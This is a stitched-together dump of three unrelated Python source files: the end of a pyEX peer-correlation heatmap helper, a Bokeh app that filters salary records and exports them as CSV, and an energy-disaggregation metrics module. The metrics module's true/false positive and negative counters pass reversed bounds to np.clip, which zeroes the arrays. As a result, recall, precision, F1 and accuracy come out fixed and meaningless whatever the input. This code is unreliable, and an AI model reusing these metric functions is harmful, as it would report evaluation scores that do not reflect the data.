ret.columns = ret.columns.tolist()
return ret
def peerCorrelationPlot(client, symbol, range="6m"):
"""This will plot a dataframe of peer correlations for the given symbol across
the given range
Note: this function requires the use of `seaborn.heatmap`
Args:
client (pyEX.Client): Client
symbol (string): Ticker
range (string): range to use, for pyEX.chart
Returns:
DataFrame: result
"""
import seaborn as sns
    return sns.heatmap(peerCorrelation(client, symbol, range))
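# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module). It assumes a
# valid IEX Cloud API token; the token string and ticker below are
# placeholders, and matplotlib is only used to display the seaborn heatmap.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    import matplotlib.pyplot as plt
    import pyEX

    client = pyEX.Client(api_token="YOUR_IEX_TOKEN")  # hypothetical token
    # Correlation matrix of a ticker against its IEX-reported peers over 6 months
    print(peerCorrelation(client, "AAPL", range="6m"))
    # Same matrix rendered as a heatmap
    peerCorrelationPlot(client, "AAPL", range="6m")
    plt.show()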
|
py | 1a40dc838fb82953b33c27706c21b9ffa299dfa3 | from os.path import dirname, join
import pandas as pd
from bokeh.layouts import row, column
from bokeh.models import ColumnDataSource, CustomJS
from bokeh.models.widgets import RangeSlider, Button, DataTable, TableColumn, NumberFormatter
from bokeh.io import curdoc
df = pd.read_csv(join(dirname(__file__), 'salary_data.csv'))
source = ColumnDataSource(data=dict())
def update():
current = df[(df['salary'] >= slider.value[0]) & (df['salary'] <= slider.value[1])].dropna()
source.data = {
'name' : current.name,
'salary' : current.salary,
'years_experience' : current.years_experience,
}
slider = RangeSlider(title="Max Salary", start=10000, end=110000, value=(10000, 50000), step=1000, format="0,0")
slider.on_change('value', lambda attr, old, new: update())
button = Button(label="Download", button_type="success")
button.js_on_click(CustomJS(args=dict(source=source),
code=open(join(dirname(__file__), "download.js")).read()))
columns = [
TableColumn(field="name", title="Employee Name"),
TableColumn(field="salary", title="Income", formatter=NumberFormatter(format="$0,0.00")),
TableColumn(field="years_experience", title="Experience (years)")
]
data_table = DataTable(source=source, columns=columns, width=800)
controls = column(slider, button)
curdoc().add_root(row(controls, data_table))
curdoc().title = "Export CSV"
update()
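# Note (not part of the original script): because the app attaches its layout
# to curdoc(), it is meant to be served by the Bokeh server rather than run as
# a plain Python script, e.g.
#
#     bokeh serve --show export_csv/
#
# where "export_csv/" is an assumed directory name containing this main.py
# together with salary_data.csv and download.js, both loaded from that folder.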
|
py | 1a40dccd9fb4df64f8945e737fc82e71b871533b | from Logger import log
import numpy as np
# from sklearn.metrics import confusion_matrix
def get_TP(target, prediction, threshold):
'''
    compute the number of true positives
    Parameters:
    ----------------
    target: the ground truth, np.array
prediction: the prediction, np.array
threshold: float
'''
assert (target.shape == prediction.shape)
target = 1 - np.clip(target, threshold, 0) / threshold
prediction = 1 - np.clip(prediction, threshold, 0) / threshold
tp_array = np.logical_and(target, prediction) * 1.0
tp = np.sum(tp_array)
return tp
def get_FP(target, prediction, threshold):
'''
    compute the number of false positives
    Parameters:
    ----------------
    target: the ground truth, np.array
prediction: the prediction, np.array
threshold: float
'''
assert (target.shape == prediction.shape)
target = np.clip(target, threshold, 0) / threshold
prediction = 1 - np.clip(prediction, threshold, 0) / threshold
fp_array = np.logical_and(target, prediction) * 1.0
fp = np.sum(fp_array)
return fp
def get_FN(target, prediction, threshold):
'''
    compute the number of false negatives
    Parameters:
    ----------------
    target: the ground truth, np.array
prediction: the prediction, np.array
threshold: float
'''
assert (target.shape == prediction.shape)
target = 1 - np.clip(target, threshold, 0) / threshold
prediction = np.clip(prediction, threshold, 0) / threshold
fn_array = np.logical_and(target, prediction) * 1.0
fn = np.sum(fn_array)
return fn
def get_TN(target, prediction, threshold):
'''
    compute the number of true negatives
    Parameters:
    ----------------
    target: the ground truth, np.array
prediction: the prediction, np.array
threshold: float
'''
assert (target.shape == prediction.shape)
target = np.clip(target, threshold, 0) / threshold
prediction = np.clip(prediction, threshold, 0) / threshold
tn_array = np.logical_and(target, prediction) * 1.0
tn = np.sum(tn_array)
return tn
def get_recall(target, prediction, threshold):
'''
compute the recall rate
Parameters:
----------------
    target: the ground truth, np.array
prediction: the prediction, np.array
threshold: float
'''
tp = get_TP(target, prediction, threshold)
fn = get_FN(target, prediction, threshold)
log('tp={0}'.format(tp))
log('fn={0}'.format(fn))
if tp + fn <= 0.0:
recall = tp / (tp + fn + 1e-9)
else:
recall = tp / (tp + fn)
return recall
def get_precision(target, prediction, threshold):
'''
compute the precision rate
Parameters:
----------------
    target: the ground truth, np.array
prediction: the prediction, np.array
threshold: float
'''
tp = get_TP(target, prediction, threshold)
fp = get_FP(target, prediction, threshold)
log('tp={0}'.format(tp))
log('fp={0}'.format(fp))
if tp + fp <= 0.0:
precision = tp / (tp + fp + 1e-9)
else:
precision = tp / (tp + fp)
return precision
def get_F1(target, prediction, threshold):
'''
compute the F1 score
Parameters:
----------------
    target: the ground truth, np.array
prediction: the prediction, np.array
threshold: float
'''
recall = get_recall(target, prediction, threshold)
log(recall)
precision = get_precision(target, prediction, threshold)
log(precision)
if precision == 0.0 or recall == 0.0:
f1 = 0.0
else:
f1 = 2 * precision * recall / (precision + recall)
return f1
def get_accuracy(target, prediction, threshold):
'''
compute the accuracy rate
Parameters:
----------------
    target: the ground truth, np.array
prediction: the prediction, np.array
threshold: float
'''
tp = get_TP(target, prediction, threshold)
tn = get_TN(target, prediction, threshold)
accuracy = (tp + tn) / target.size
return accuracy
def get_relative_error(target, prediction):
'''
compute the relative_error
Parameters:
----------------
    target: the ground truth, np.array
prediction: the prediction, np.array
'''
assert (target.shape == prediction.shape)
return np.mean(np.nan_to_num(np.abs(target - prediction) / np.maximum(target, prediction)))
def get_abs_error(target, prediction):
'''
compute the absolute_error
Parameters:
----------------
    target: the ground truth, np.array
prediction: the prediction, np.array
'''
assert (target.shape == prediction.shape)
data = np.abs(target - prediction)
mean, std, min_v, max_v, quartile1, median, quartile2 = get_statistics(data)
return mean, std, min_v, max_v, quartile1, median, quartile2, data
def get_nde(target, prediction):
'''
compute the normalized disaggregation error
Parameters:
----------------
    target: the ground truth, np.array
prediction: the prediction, np.array
'''
return np.sum((target - prediction) ** 2) / np.sum((target ** 2))
def get_sae(target, prediction, sample_second):
'''
compute the signal aggregate error
sae = |\hat(r)-r|/r where r is the ground truth total energy;
\hat(r) is the predicted total energy.
'''
r = np.sum(target * sample_second * 1.0 / 3600.0)
rhat = np.sum(prediction * sample_second * 1.0 / 3600.0)
sae = np.abs(r - rhat) / np.abs(r)
return sae
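# Worked example for get_sae (illustrative, not part of the original module):
# with sample_second=1, an hour of ground truth at a constant 1000 W gives
# r = 3600 * 1000 / 3600 = 1000 Wh, a constant 900 W prediction gives
# rhat = 900 Wh, and sae = |1000 - 900| / 1000 = 0.1.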
def get_Epd(target, prediction, sample_second):
'''
Energy per day
- calculate energy of a day for both ground truth and prediction
- sum all the energies
- divide by the number of days
'''
day = int(24.0 * 3600 / sample_second) #how many rows per day
gt_en_days = []
pred_en_days = []
for start in range(0, int(len(target)-day), int(day)):
gt_en_days.append(np.sum(target[start:start+day]*sample_second)/3600)
pred_en_days.append(np.sum(prediction[start:start+day]*sample_second)/3600)
Epd = np.sum(np.abs(np.array(gt_en_days)-np.array(pred_en_days)))/(len(target)/day)
return Epd
def get_statistics(data):
mean = np.mean(data)
std = np.std(data)
min_v = np.sort(data)[0]
max_v = np.sort(data)[-1]
quartile1 = np.percentile(data, 25)
median = np.percentile(data, 50)
quartile2 = np.percentile(data, 75)
return mean, std, min_v, max_v, quartile1, median, quartile2 |